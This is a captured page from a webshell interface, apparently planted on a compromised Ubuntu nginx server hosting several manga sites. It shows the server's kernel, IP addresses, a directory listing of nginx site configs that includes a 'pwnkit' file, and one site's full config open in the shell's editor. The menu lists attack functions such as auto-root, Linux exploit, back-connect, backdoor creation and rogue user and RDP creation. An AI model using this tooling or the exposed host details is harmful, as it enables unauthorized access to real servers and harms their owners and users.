Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
sites-available /
[ HOME SHELL ]
Name
Size
Permission
Action
berripix.com.conf
2.66
KB
-rw-rw-r--
default
2.36
KB
-rwxrwxrwx
legendbo.com.conf
2.35
KB
-rw-rw-r--
mangaberri.com.conf
3.04
KB
-rw-rw-r--
mangacherri.com.conf
2.33
KB
-rw-rw-r--
mangalegend.com.conf
2.74
KB
-rw-r--r--
pwnkit
0
B
-rw-r--r--
readmodulo.com.conf
2.77
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mangacherri.com.conf
server { listen 80; listen [::]:80; server_name mangacherri.com www.mangacherri.com; add_header X-Redirected-By "nginx 302 temporary" always; return 302 https://$host$request_uri; } # Main HTTPS server server { listen 443 ssl http2; listen [::]:443 ssl http2; server_name mangacherri.com www.mangacherri.com; root /var/www/html/mangacherri/public_html; index index.php index.html; ssl_certificate /etc/letsencrypt/live/mangacherri.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/mangacherri.com/privkey.pem; include /etc/letsencrypt/options-ssl-nginx.conf; client_body_buffer_size 16k; client_max_body_size 10m; if ($block_malware) { return 403; } # === Rewrite Clean URLs === location / { try_files $uri $uri/ $uri.php @clean_urls; } location @clean_urls { rewrite ^/genre/([^/]+)$ /genre.php?genre=$1 last; rewrite ^/([A-Za-z0-9_-]+)/([0-9]+)$ /reading.php?title=$1&chapter=$2 last; rewrite ^/([A-Za-z0-9_-]+)$ /read-manga.php?title=$1 last; rewrite ^(.*)$ /index.php?$args last; } location ~* ^/mangas/.*\.(php|php[0-9]?|phtml|pht|phar|phps|cgi|pl|py|sh)$ { deny all; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.3-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param HTTPS on; fastcgi_read_timeout 60s; add_header Cache-Control "no-store, no-cache, must-revalidate, max-age=0"; add_header Pragma "no-cache"; expires off; #add_header X-Content-Type-Options "nosniff" always; #add_header X-Frame-Options "DENY" always; #add_header X-XSS-Protection "1; mode=block" always; #add_header Content-Security-Policy "script-src 'self'" always; } # Static file caching location ~* \.(jpg|jpeg|png|gif|webp)$ { expires 30d; access_log off; } location ~* \.(css|js)$ { expires 30d; access_log off; } # Custom 404 Page error_page 404 /404.php; location = /404.php { internal; } # Block Hidden Files location ~ /\.(?!well-known).* { deny all; } }
Close